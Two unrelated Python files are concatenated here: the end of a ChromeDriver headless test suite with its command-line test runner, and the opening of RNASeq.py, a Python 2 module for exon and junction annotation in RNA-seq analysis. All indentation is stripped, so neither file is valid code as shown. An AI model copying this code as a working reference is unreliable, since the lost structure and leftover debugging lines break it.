def setUp(self):
self._driver = self.CreateDriver(chrome_switches = ["--headless"],
accept_insecure_certs = True)
def testLoadsPage(self):
print("loading")
self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
# Verify that page content loaded.
self._driver.FindElement('css selector', '#link')
def testNavigateNewWindow(self):
print("loading")
self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
self._driver.ExecuteScript(
'document.getElementById("link").href = "page_test.html";')
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
# Verify that page content loaded in new window.
self._driver.FindElement('css selector', '#link')
class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
def setUp(self):
self._driver = self.CreateDriver(chrome_switches=['--headless'])
def _newWindowDoesNotFocus(self, window_type='window'):
current_handles = self._driver.GetWindowHandles()
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/focus_blur_test.html'))
new_window = self._driver.NewWindow(window_type=window_type)
text = self._driver.FindElement('css selector', '#result').GetText()
self.assertTrue(new_window['handle'] not in current_handles)
self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles())
self.assertEquals(text, 'PASS')
def testNewWindowDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='window')
def testNewTabDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='tab')
def testWindowFullScreen(self):
old_rect_list = self._driver.GetWindowRect()
# Testing the resulting screensize doesn't work in headless, because there
# is no screen to give a size.
# We just want to ensure this command doesn't timeout or error.
self._driver.FullScreenWindow()
# Restore a known size so next tests won't fail
self._driver.SetWindowRect(*old_rect_list)
def testPrintHeadless(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
pdf = self._driver.PrintPDF({
'orientation': 'landscape',
'scale': 1.1,
'margin': {
'top': 1.1,
'bottom': 2.2,
'left': 3.3,
'right': 4.4
},
'background': True,
'shrinkToFit': False,
'pageRanges': [1],
'page': {
'width': 15.6,
'height': 20.6
}
})
decoded_pdf = base64.b64decode(pdf)
self.assertTrue(decoded_pdf.startswith("%PDF"))
self.assertTrue(decoded_pdf.endswith("%%EOF"))
def testPrintInvalidArgumentHeadless(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self.assertRaises(chromedriver.InvalidArgument,
self._driver.PrintPDF, {'pageRanges': ['x-y']})
class SupportIPv4AndIPv6(ChromeDriverBaseTest):
def testSupportIPv4AndIPv6(self):
has_ipv4 = False
has_ipv6 = False
for info in socket.getaddrinfo('localhost', 0):
if info[0] == socket.AF_INET:
has_ipv4 = True
if info[0] == socket.AF_INET6:
has_ipv6 = True
if has_ipv4:
self.CreateDriver("http://127.0.0.1:" +
str(chromedriver_server.GetPort()))
if has_ipv6:
self.CreateDriver('http://[::1]:' +
str(chromedriver_server.GetPort()))
class JavaScriptTests(ChromeDriverBaseTestWithWebServer):
def GetFileUrl(self, filename):
return 'file://' + self.js_root + filename
def setUp(self):
self._driver = self.CreateDriver()
self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/'
self._driver.SetWindowRect(640, 480, 0, 0)
def checkTestResult(self):
def getStatus():
return self._driver.ExecuteScript('return window.CDCJStestRunStatus')
self.WaitForCondition(getStatus)
self.assertEquals('PASS', getStatus())
def testAllJS(self):
self._driver.Load(self.GetFileUrl('call_function_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('execute_async_script_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('execute_script_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('get_element_location_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('get_element_region_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('focus_test.html'))
self.checkTestResult()
# 'Z' in the beginning is to make test executed in the end of suite.
class ZChromeStartRetryCountTest(unittest.TestCase):
def testChromeStartRetryCount(self):
self.assertEquals(0, chromedriver.ChromeDriver.retry_count,
"Chrome was retried to start during suite execution "
"in following tests:\n" +
', \n'.join(chromedriver.ChromeDriver.retried_tests))
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--replayable',
help="Don't truncate long strings in the log so that the log can be "
"replayed.")
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--filter', type='string', default='',
help='Filter for specifying what tests to run, \"*\" will run all,'
'including tests excluded by default. E.g., *testRunMethod')
parser.add_option(
'', '--android-package',
help=('Android package key. Possible values: ' +
str(list(_ANDROID_NEGATIVE_FILTER.keys()))))
parser.add_option(
'', '--isolated-script-test-output',
help='JSON output file used by swarming')
parser.add_option(
'', '--test-type',
help='Select type of tests to run. Possible value: integration')
options, args = parser.parse_args()
if options.chromedriver is None:
parser.error('--chromedriver is required.\n' +
'Please run "%s --help" for help' % __file__)
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if (not os.path.exists(options.chromedriver) and
util.GetPlatformName() == 'win' and
not options.chromedriver.lower().endswith('.exe')):
options.chromedriver = options.chromedriver + '.exe'
if not os.path.exists(options.chromedriver):
parser.error('Path given by --chromedriver is invalid.\n' +
'Please run "%s --help" for help' % __file__)
if options.replayable and not options.log_path:
parser.error('Need path specified when replayable log set to true.')
# When running in commit queue & waterfall, minidump will need to write to
# same directory as log, so use the same path
global _MINIDUMP_PATH
if options.log_path:
_MINIDUMP_PATH = os.path.dirname(options.log_path)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver)
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
global chromedriver_server
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path,
replayable=options.replayable)
global _CHROMEDRIVER_SERVER_PID
_CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid()
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
# In some test environments (such as commit queue), it's not convenient to
# specify Chrome binary location on the command line. Try to use heuristics
# to locate the Chrome binary next to the ChromeDriver binary.
driver_path = os.path.dirname(_CHROMEDRIVER_BINARY)
chrome_path = None
platform = util.GetPlatformName()
if platform == 'linux':
chrome_path = os.path.join(driver_path, 'chrome')
elif platform == 'mac':
if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')):
chrome_path = os.path.join(driver_path, 'Google Chrome.app',
'Contents', 'MacOS', 'Google Chrome')
else:
chrome_path = os.path.join(driver_path, 'Chromium.app',
'Contents', 'MacOS', 'Chromium')
elif platform == 'win':
chrome_path = os.path.join(driver_path, 'chrome.exe')
if chrome_path is not None and os.path.exists(chrome_path):
_CHROME_BINARY = chrome_path
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if _ANDROID_PACKAGE_KEY:
devil_chromium.Initialize()
if options.filter == '':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter()
if options.test_type is not None:
if options.test_type == 'integration':
negative_filter += _INTEGRATION_NEGATIVE_FILTER
else:
parser.error('Invalid --test-type. Valid value: integration')
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
test_suites = [test_suite]
ChromeDriverBaseTestWithWebServer.GlobalSetUp()
runner = unittest.TextTestRunner(
stream=sys.stdout, descriptions=False, verbosity=2,
resultclass=unittest_util.AddSuccessTextTestResult)
result = runner.run(test_suite)
results = [result]
num_failed = len(result.failures) + len(result.errors)
# Limit fail tests to 10 to avoid real bug causing many tests to fail
# Only enable retry for automated bot test
if (num_failed > 0 and num_failed <= 10
and options.test_type == 'integration'):
retry_test_suite = unittest.TestSuite()
for f in result.failures:
retry_test_suite.addTest(f[0])
for e in result.errors:
retry_test_suite.addTest(e[0])
test_suites.append(retry_test_suite)
print('\nRetrying failed tests\n')
retry_result = runner.run(retry_test_suite)
results.append(retry_result)
ChromeDriverBaseTestWithWebServer.GlobalTearDown()
if options.isolated_script_test_output:
util.WriteResultToJSONFile(test_suites, results,
options.isolated_script_test_output)
util.TryUploadingResultToResultSink(results)
sys.exit(len(results[-1].failures) + len(results[-1].errors))
|
RNASeq.py
|
###RNASeq
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, string, os
from stats_scripts import statistics
import math
import os.path
import unique
import update
import copy
import time
import export
from build_scripts import EnsemblImport; reload(EnsemblImport)
try: from build_scripts import JunctionArrayEnsemblRules
except Exception: pass ### occurs with circular imports
try: from build_scripts import JunctionArray; reload(JunctionArray)
except Exception: pass ### occurs with circular imports
try: from build_scripts import ExonArrayEnsemblRules
except Exception: pass ### occurs with circular imports
import multiprocessing
import logging
import traceback
import warnings
import bisect
import shutil
from visualization_scripts import clustering; reload(clustering)
try:
import scipy
import scipy.cluster.hierarchy as sch
import scipy.spatial.distance as dist
except Exception: pass
try: import numpy
except Exception: pass
LegacyMode = True
try:
from scipy import average as Average
from scipy import stats
except Exception:
try: from statistics import avg as Average
except Exception: pass ### occurs with circular imports
def filepath(filename):
fn = unique.filepath(filename)
return fn
def read_directory(sub_dir):
dir_list_clean=[]
dir_list = unique.read_directory(sub_dir)
for filepath in dir_list:
if 'log.txt' not in filepath and '.log' not in filepath:
dir_list_clean.append(filepath)
return dir_list_clean
def makeUnique(item):
db1={}; list1=[]; k=0
for i in item:
try: db1[i]=[]
except TypeError: db1[tuple(i)]=[]; k=1
for i in db1:
if k==0: list1.append(i)
else: list1.append(list(i))
list1.sort()
return list1
def cleanUpLine(line):
line = string.replace(line,'\n','')
line = string.replace(line,'\c','')
data = string.replace(line,'\r','')
data = string.replace(data,'"','')
return data
######### Below code deals with building the AltDatabase #########
def collapseNoveExonBoundaries(novel_exon_coordinates,dataset_dir):
""" Merge exon predictions based on junction measurments from TopHat. The predicted exons are
bound by the identified splice site and the consensus length of reads in that sample"""
dataset_dir = string.replace(dataset_dir,'exp.','ExpressionInput/novel.')
export_data,status = AppendOrWrite(dataset_dir) ### Export all novel exons
if status == 'not found':
export_data.write('GeneID\tStrand\tExonID\tCoordinates\n')
novel_gene_exon_db={}
for (chr,coord) in novel_exon_coordinates:
key = (chr,coord)
ji,side,coord2 = novel_exon_coordinates[(chr,coord)]
try:
if side == 'left': ### left corresponds to the position of coord
intron = string.split(string.split(ji.ExonRegionID(),'-')[1][:2],'.')[0]
else:
intron = string.split(string.split(ji.ExonRegionID(),'-'),'.')[0]
ls = [coord,coord2]
ls.sort() ### The order of this is variable
if ji.Strand() == '-':
coord2,coord = ls
else: coord,coord2 = ls
if 'I' in intron and ji.Novel() == 'side':
#if 'ENSG00000221983' == ji.GeneID():
try: novel_gene_exon_db[ji.GeneID(),ji.Strand(),intron].append((coord,coord2,ji,key,side))
except Exception: novel_gene_exon_db[ji.GeneID(),ji.Strand(),intron] = [(coord,coord2,ji,key,side)]
except Exception: pass
outdatedExons={} ### merging novel exons, delete one of the two original
for key in novel_gene_exon_db:
firstNovel=True ### First putative novel exon coordinates examined for that gene
novel_gene_exon_db[key].sort()
if key[1]=='-':
novel_gene_exon_db[key].reverse()
for (c1,c2,ji,k,s) in novel_gene_exon_db[key]:
if firstNovel==False:
#print [c1,l2] #abs(c1-l2);sys.exit()
### see if the difference between the start position of the second exon is less than 300 nt away from the end of the last
if abs(c2-l1) < 300 and os!=s: ### 80% of human exons are less than 200nt - PMID: 15217358
proceed = True
#if key[1]=='-':
if c2 in k:
novel_exon_coordinates[k] = ji,s,l1
outdatedExons[ok]=None ### merged out entry
elif l1 in ok:
novel_exon_coordinates[ok] = li,os,c2
outdatedExons[k]=None ### merged out entry
else:
proceed = False ### Hence, the two splice-site ends are pointing to two distinct versus one common exons
"""
if c2 == 18683670 or l1 == 18683670:
print key,abs(c2-l1), c1, c2, l1, l2, li.ExonRegionID(), ji.ExonRegionID();
print k,novel_exon_coordinates[k]
print ok,novel_exon_coordinates[ok]
"""
if proceed:
values = string.join([ji.GeneID(),ji.Strand(),key[2],ji.Chr()+':'+str(l1)+'-'+str(c2)],'\t')+'\n'
export_data.write(values)
### For negative strand genes, c1 is larger than c2 but is the 5' begining of the exon
l1,l2,li,ok,os = c1,c2,ji,k,s ### record the last entry
firstNovel=False
for key in outdatedExons: ### Delete the non-merged entry
del novel_exon_coordinates[key]
export_data.close()
return novel_exon_coordinates
def exportNovelExonToBedCoordinates(species,novel_exon_coordinates,chr_status,searchChr=None):
### Export the novel exon coordinates based on those in the junction BED file to examine the differential expression of the predicted novel exon
#bamToBed -i accepted_hits.bam -split| coverageBed -a stdin -b /home/databases/hESC_differentiation_exons.bed > day20_7B__exons-novel.bed
bed_export_path = filepath('AltDatabase/'+species+'/RNASeq/chr/'+species + '_Ensembl_exons'+searchChr+'.bed')
bed_data = open(bed_export_path,'w') ### Appends to existing file
for (chr,coord) in novel_exon_coordinates:
ji,side,coord2 = novel_exon_coordinates[(chr,coord)]
if side == 'left': start,stop = coord,coord2
if side == 'right': start,stop = coord2,coord
try: gene = ji.GeneID()
except Exception: gene = 'NA'
if gene == None: gene = 'NA'
if gene == None: gene = 'NA'
if gene != 'NA': ### Including these has no benefit for AltAnalyze (just slows down alignment and piles up memory)
if ji.Strand() == '-': stop,start=start,stop
if chr_status == False:
chr = string.replace(chr,'chr','') ### This will thus match up to the BAM files
a = [start,stop]; a.sort(); start,stop = a
bed_values = [chr,str(start),str(stop),gene,'0',str(ji.Strand())]
bed_values = cleanUpLine(string.join(bed_values,'\t'))+'\n'
bed_data.write(bed_values)
bed_data.close()
return bed_export_path
def moveBAMtoBEDFile(species,dataset_name,root_dir):
bed_export_path = filepath('AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.bed')
dataset_name = string.replace(dataset_name,'exp.','')
new_fn = root_dir+'/BAMtoBED/'+species + '_'+dataset_name+'_exons.bed'
new_fn = string.replace(new_fn,'.txt','')
print 'Writing exon-level coordinates to BED file:'
print new_fn
catFiles(bed_export_path,'chr') ### concatenate the files ot the main AltDatabase directory then move
export.customFileMove(bed_export_path,new_fn)
return new_fn
def reformatExonFile(species,type,chr_status):
if type == 'exon':
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt'
export_path = 'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.txt'
### Used by BEDTools to get counts per specific AltAnalyze exon region (should augment with de novo regions identified from junction analyses)
bed_export_path = 'AltDatabase/'+species+'/RNASeq/chr/'+species + '_Ensembl_exons.bed'
bed_data = export.ExportFile(bed_export_path)
else:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_junction.txt'
export_path = 'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
print 'Writing',export_path
export_data = export.ExportFile(export_path)
fn=filepath(filename); x=0
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0:
x+=1
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['affy_class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
else:
try: gene, exonid, chr, strand, start, stop, constitutive_call, ens_exon_ids, splice_events, splice_junctions = t
except Exception: print t;kill
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention,
if constitutive_call == 'yes': ens_constitutive_status = '1'
else: ens_constitutive_status = '0'
export_values = [gene+':'+exonid, exonid, gene, '', chr, strand, start, stop, 'known', constitutive_call, ens_exon_ids, ens_constitutive_status]
export_values+= [exonid, start, stop, splice_events, splice_junctions]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
if type == 'exon':
if chr_status == False:
chr = string.replace(chr,'chr','') ### This will thus match up to the BAM files
bed_values = [chr,start,stop,gene+':'+exonid+'_'+ens_exon_ids,'0',strand]
bed_values = string.join(bed_values,'\t')+'\n'; bed_data.write(bed_values)
export_data.close()
if type == 'exon': bed_data.close()
def importExonAnnotations(species,type,search_chr):
if 'exon' in type:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt'
else:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_junction.txt'
fn=filepath(filename); x=0; exon_annotation_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: x=1
else:
gene, exonid, chr, strand, start, stop, constitutive_call, ens_exon_ids, splice_events, splice_junctions = t; proceed = 'yes'
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if len(search_chr)>0:
if chr != search_chr: proceed = 'no'
if proceed == 'yes':
if type == 'exon': start = int(start); stop = int(stop)
ea = EnsemblImport.ExonAnnotationsSimple(chr, strand, start, stop, gene, ens_exon_ids, constitutive_call, exonid, splice_events, splice_junctions)
if type == 'junction_coordinates':
exon1_start,exon1_stop = string.split(start,'|')
exon2_start,exon2_stop = string.split(stop,'|')
if strand == '-':
exon1_stop,exon1_start = exon1_start,exon1_stop
exon2_stop,exon2_start = exon2_start,exon2_stop
#if gene == 'ENSMUSG00000027340': print chr,int(exon1_stop),int(exon2_start)
exon_annotation_db[chr,int(exon1_stop),int(exon2_start)]=ea
elif type == 'distal-exon':
exon_annotation_db[gene] = exonid
else:
try: exon_annotation_db[gene].append(ea)
except KeyError: exon_annotation_db[gene]=[ea]
return exon_annotation_db
def exportKnownJunctionComparisons(species):
gene_junction_db = JunctionArrayEnsemblRules.importEnsemblUCSCAltJunctions(species,'standard')
gene_intronjunction_db = JunctionArrayEnsemblRules.importEnsemblUCSCAltJunctions(species,'_intronic')
for i in gene_intronjunction_db: gene_junction_db[i]=[]
gene_junction_db2={}
for (gene,critical_exon,incl_junction,excl_junction) in gene_junction_db:
critical_exons = string.split(critical_exon,'|')
for critical_exon in critical_exons:
try: gene_junction_db2[gene,incl_junction,excl_junction].append(critical_exon)
except Exception: gene_junction_db2[gene,incl_junction,excl_junction] = [critical_exon]
gene_junction_db = gene_junction_db2; gene_junction_db2=[]
junction_export = 'AltDatabase/' + species + '/RNASeq/'+ species + '_junction_comps.txt'
fn=filepath(junction_export); data = open(fn,'w')
print "Exporting",junction_export
title = 'gene'+'\t'+'critical_exon'+'\t'+'exclusion_junction_region'+'\t'+'inclusion_junction_region'+'\t'+'exclusion_probeset'+'\t'+'inclusion_probeset'+'\t'+'data_source'+'\n'
data.write(title); temp_list=[]
for (gene,incl_junction,excl_junction) in gene_junction_db:
critical_exons = unique.unique(gene_junction_db[(gene,incl_junction,excl_junction)])
critical_exon = string.join(critical_exons,'|')
temp_list.append(string.join([gene,critical_exon,excl_junction,incl_junction,gene+':'+excl_junction,gene+':'+incl_junction,'AltAnalyze'],'\t')+'\n')
temp_list = unique.unique(temp_list)
for i in temp_list: data.write(i)
data.close()
def getExonAndJunctionSequences(species):
export_exon_filename = 'AltDatabase/'+species+'/RNASeq/'+species+'_Ensembl_exons.txt'
ensembl_exon_db = ExonArrayEnsemblRules.reimportEnsemblProbesetsForSeqExtraction(export_exon_filename,'null',{})
### Import just the probeset region for mRNA alignment analysis
analysis_type = ('region_only','get_sequence'); array_type = 'RNASeq'
dir = 'AltDatabase/'+species+'/SequenceData/chr/'+species; gene_seq_filename = dir+'_gene-seq-2000_flank.fa'
ensembl_exon_db = EnsemblImport.import_sequence_data(gene_seq_filename,ensembl_exon_db,species,analysis_type)
critical_exon_file = 'AltDatabase/'+species+'/'+ array_type + '/' + array_type+'_critical-exon-seq.txt'
getCriticalJunctionSequences(critical_exon_file,species,ensembl_exon_db)
"""
### Import the full Ensembl exon sequence (not just the probeset region) for miRNA binding site analysis
analysis_type = 'get_sequence'; array_type = 'RNASeq'
dir = 'AltDatabase/'+species+'/SequenceData/chr/'+species; gene_seq_filename = dir+'_gene-seq-2000_flank.fa'
ensembl_exon_db = EnsemblImport.import_sequence_data(gene_seq_filename,ensembl_exon_db,species,analysis_type)
"""
critical_exon_file = 'AltDatabase/'+species+'/'+ array_type + '/' + array_type+'_critical-exon-seq.txt'
updateCriticalExonSequences(critical_exon_file, ensembl_exon_db)
def updateCriticalExonSequences(filename,ensembl_exon_db):
exon_seq_db_filename = filename[:-4]+'_updated.txt'
exonseq_data = export.ExportFile(exon_seq_db_filename)
critical_exon_seq_db={}; null_count={}
for gene in ensembl_exon_db:
gene_exon_data={}
for probe_data in ensembl_exon_db[gene]:
exon_id,((probe_start,probe_stop,probeset_id,exon_class,transcript_clust),ed) = probe_data
try: gene_exon_data[probeset_id] = ed.ExonSeq()
except Exception: null_count[gene]=[] ### Occurs for non-chromosomal DNA (could also download this sequence though)
if len(gene_exon_data)>0: critical_exon_seq_db[gene] = gene_exon_data
print len(null_count),'genes not assigned sequenced (e.g.,non-chromosomal)'
ensembl_exon_db=[]
### Export exon sequences
for gene in critical_exon_seq_db:
gene_exon_data = critical_exon_seq_db[gene]
for probeset in gene_exon_data:
critical_exon_seq = gene_exon_data[probeset]
values = [probeset,'',critical_exon_seq]
values = string.join(values,'\t')+'\n'
exonseq_data.write(values)
exonseq_data.close()
print exon_seq_db_filename, 'exported....'
def getCriticalJunctionSequences(filename,species,ensembl_exon_db):
### Assemble and export junction sequences
junction_seq_db_filename = string.replace(filename,'exon-seq','junction-seq')
junctionseq_data = export.ExportFile(junction_seq_db_filename)
critical_exon_seq_db={}; null_count={}
for gene in ensembl_exon_db:
gene_exon_data={}
for probe_data in ensembl_exon_db[gene]:
exon_id,((probe_start,probe_stop,probeset_id,exon_class,transcript_clust),ed) = probe_data
try: gene_exon_data[probeset_id] = ed.ExonSeq()
except Exception: null_count[gene]=[] ### Occurs for non-chromosomal DNA (could also download this sequence though)
if len(gene_exon_data)>0: critical_exon_seq_db[gene] = gene_exon_data
print len(null_count),'genes not assigned sequenced (e.g.,non-chromosomal)'
ensembl_exon_db=[]
junction_annotation_db = importExonAnnotations(species,'junction',[])
for gene in junction_annotation_db:
if gene in critical_exon_seq_db:
gene_exon_data = critical_exon_seq_db[gene]
for jd in junction_annotation_db[gene]:
exon1,exon2=string.split(jd.ExonRegionIDs(),'-')
p1=gene+':'+exon1
p2=gene+':'+exon2
p1_seq=gene_exon_data[p1][-15:]
p2_seq=gene_exon_data[p2][:15]
junction_seq = p1_seq+'|'+p2_seq
junctionseq_data.write(gene+':'+jd.ExonRegionIDs()+'\t'+junction_seq+'\t\n')
junctionseq_data.close()
print junction_seq_db_filename, 'exported....'
def getEnsemblAssociations(species,data_type,test_status,force):
### Get UCSC associations (download databases if necessary)
from build_scripts import UCSCImport
mRNA_Type = 'mrna'; run_from_scratch = 'yes'
export_all_associations = 'no' ### YES only for protein prediction analysis
update.buildUCSCAnnoationFiles(species,mRNA_Type,export_all_associations,run_from_scratch,force)
null = EnsemblImport.getEnsemblAssociations(species,data_type,test_status); null=[]
reformatExonFile(species,'exon',True); reformatExonFile(species,'junction',True)
exportKnownJunctionComparisons(species)
getExonAndJunctionSequences(species)
######### Below code deals with user read alignment as opposed to building the AltDatabase #########
class ExonInfo:
def __init__(self,start,unique_id,annotation):
self.start = start; self.unique_id = unique_id; self.annotation = annotation
def ReadStart(self): return self.start
def UniqueID(self): return self.unique_id
def Annotation(self): return self.annotation
def setExonRegionData(self,rd): self.rd = rd
def ExonRegionData(self): return self.rd
def setExonRegionID(self,region_id): self.region_id = region_id
def ExonRegionID(self): return self.region_id
def setAlignmentRegion(self,region_type): self.region_type = region_type
def AlignmentRegion(self): return self.region_type
def __repr__(self): return "ExonData values"
class JunctionData:
def __init__(self,chr,strand,exon1_stop,exon2_start,junction_id,biotype):
self.chr = chr; self.strand = strand; self._chr = chr
self.exon1_stop = exon1_stop; self.exon2_start = exon2_start
self.junction_id = junction_id; self.biotype = biotype
#self.reads = reads; self.condition = condition
self.left_exon = None; self.right_exon = None; self.jd = None; self.gene_id = None
self.trans_splicing = None
self.splice_events=''
self.splice_junctions=''
self.seq_length=''
self.uid = None
def Chr(self): return self.chr
def Strand(self): return self.strand
def Exon1Stop(self): return self.exon1_stop
def Exon2Start(self): return self.exon2_start
def setExon1Stop(self,exon1_stop): self.exon1_stop = exon1_stop
def setExon2Start(self,exon2_start): self.exon2_start = exon2_start
def setSeqLength(self,seq_length): self.seq_length = seq_length
def SeqLength(self): return self.seq_length
def BioType(self): return self.biotype
def checkExonPosition(self,exon_pos):
if exon_pos == self.Exon1Stop(): return 'left'
else: return 'right'
### These are used to report novel exon boundaries
def setExon1Start(self,exon1_start): self.exon1_start = exon1_start
def setExon2Stop(self,exon2_stop): self.exon2_stop = exon2_stop
def Exon1Start(self): return self.exon1_start
def Exon2Stop(self): return self.exon2_stop
def Reads(self): return self.reads
def JunctionID(self): return self.junction_id
def Condition(self): return self.condition
def setExonAnnotations(self,jd):
self.jd = jd
self.splice_events = jd.AssociatedSplicingEvent()
self.splice_junctions = jd.AssociatedSplicingJunctions()
self.exon_region = jd.ExonRegionIDs()
self.exonid = jd.ExonID()
self.gene_id = jd.GeneID()
self.uid = jd.GeneID()+':'+jd.ExonRegionIDs()
def ExonAnnotations(self): return self.jd
def setLeftExonAnnotations(self,ld): self.gene_id,self.left_exon = ld
def LeftExonAnnotations(self): return self.left_exon
def setRightExonAnnotations(self,rd): self.secondary_geneid,self.right_exon = rd
def RightExonAnnotations(self): return self.right_exon
def setGeneID(self,geneid): self.gene_id = geneid
def GeneID(self): return self.gene_id
def setSecondaryGeneID(self,secondary_geneid): self.secondary_geneid = secondary_geneid
def SecondaryGeneID(self): return self.secondary_geneid
def setTransSplicing(self): self.trans_splicing = 'yes'
def TransSplicing(self): return self.trans_splicing
def SpliceSitesFound(self):
if self.jd != None: sites_found = 'both'
elif self.left_exon != None and self.right_exon != None: sites_found = 'both'
elif self.left_exon != None: sites_found = 'left'
elif self.right_exon != None: sites_found = 'right'
else: sites_found = None
return sites_found
def setConstitutive(self,constitutive): self.constitutive = constitutive
def Constitutive(self): return self.constitutive
def setAssociatedSplicingEvent(self,splice_events): self.splice_events = splice_events
def AssociatedSplicingEvent(self): return self.splice_events
def setAssociatedSplicingJunctions(self,splice_junctions): self.splice_junctions = splice_junctions
def AssociatedSplicingJunctions(self): return self.splice_junctions
def setExonID(self,exonid): self.exonid = exonid
def ExonID(self): return self.exonid
def setExonRegionID(self,exon_region): self.exon_region = exon_region
def ExonRegionID(self): return self.exon_region
def setUniqueID(self,uid): self.uid = uid
def UniqueID(self): return self.uid
def setLeftExonRegionData(self,li): self.li = li
def LeftExonRegionData(self): return self.li
def setRightExonRegionData(self,ri): self.ri = ri
def RightExonRegionData(self): return self.ri
def setNovel(self, side): self.side = side
def Novel(self): return self.side
def __repr__(self): return "JunctionData values"
def checkBEDFileFormat(bed_dir,root_dir):
""" This method checks to see if the BED files (junction or exon) have 'chr' proceeding the chr number.
It also checks to see if some files have two underscores and one has none or if double underscores are missing from all."""
dir_list = read_directory(bed_dir)
x=0
break_now = False
chr_present = False
condition_db={}
for filename in dir_list:
fn=filepath(bed_dir+filename)
#if ('.bed' in fn or '.BED' in fn): delim = 'r'
delim = 'rU'
if '.tab' in string.lower(filename) or '.bed' in string.lower(filename) or '.junction_quantification.txt' in string.lower(filename):
condition_db[filename]=[]
for line in open(fn,delim).xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
if line[0] == '#': x=0 ### BioScope
elif x == 0: x=1 ###skip the first line
elif x < 10: ### Only check the first 10 lines
if 'chr' in line: ### Need to look at multiple input formats (chr could be in t[0] or t[1])
chr_present = True
x+=1
else:
break_now = True
break
